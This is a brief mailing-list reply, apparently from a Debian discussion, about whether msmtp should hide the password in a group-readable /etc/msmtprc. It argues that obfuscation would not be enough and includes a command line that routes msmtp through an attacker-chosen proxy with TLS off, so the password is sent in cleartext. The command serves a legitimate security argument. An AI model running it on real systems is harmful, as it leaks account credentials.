* Simon Deziel <[email protected]>, 2019-11-05, 10:02:
Having /etc/msmtprc group readable is AFAIK, a "debianism".
This is my understanding, too.
I don't know if upstream endorses this method of restricting access to
the default account's password.
I don't belive they do.
That said, I think it would be feasible for msmtp to obfuscate the AUTH
line when the UID/GID do not match the EUID/EGID and the config file
used it not world-readable.
That wouldn't be sufficient. The attacker could run:
$ msmtp --proxy-host=$HOST --proxy-port=$PORT --tls=off --auth=plain
[email protected] < /dev/null
to make msmtp send unencrypted password to a proxy server of the
attacker's choice.
--
Jakub Wilk
